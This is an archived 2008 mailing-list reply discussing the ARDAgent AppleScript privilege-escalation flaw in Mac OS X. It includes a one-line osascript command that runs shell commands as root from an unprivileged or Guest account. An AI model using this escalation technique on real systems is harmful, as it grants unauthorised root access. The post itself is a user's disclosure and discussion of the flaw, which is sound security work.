Re: Applescript vulnerability
- From: Warren Oates <warren.oates@xxxxxxxxx>
- Date: Thu, 19 Jun 2008 15:02:16 -0400
In article <uce-41199D.14343319062008@xxxxxxxxxxxxxxxxxxxxxxxxxxxx>,
Gregory Weston <uce@xxxxxxxxxx> wrote:
I suspect Dave's intention was to point out that the exploit worked on
his machine *despite* the fact that root logins are disabled. That this
condition was not a viable defense.
You can get to the root account thus:
[~]$ sudo su
Password:
sh-3.2# whoami
root
sh-3.2#
on almost any unixish machine, including OS X, with or without the root
account "enabled." This isn't as exploitable as the Slashdotted thing,
because you need an admin account with a password ... hang on ... nope,
that doesn't work from the Guest account but
[~]$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
absolutely works. Ouch. The Guest account is there to give physical
access to people you don't particularly trust, no? So anyone with a
small knowledge of Applescript and unix commands has you by the short
and curlies.
--
W. Oates
.
- Follow-Ups:
- Re: Applescript vulnerability
- From: Wes Groleau
- Re: Applescript vulnerability
- References:
- Applescript vulnerability
- From: Warren Oates
- Re: Applescript vulnerability
- From: Gregory Weston
- Re: Applescript vulnerability
- From: Gregory Weston
- Re: Applescript vulnerability
- From: Warren Oates
- Re: Applescript vulnerability
- From: Gregory Weston
- Applescript vulnerability
- Prev by Date: Re: Applescript vulnerability
- Next by Date: Re: Applescript vulnerability
- Previous by thread: Re: Applescript vulnerability
- Next by thread: Re: Applescript vulnerability
- Index(es):
Relevant Pages
|
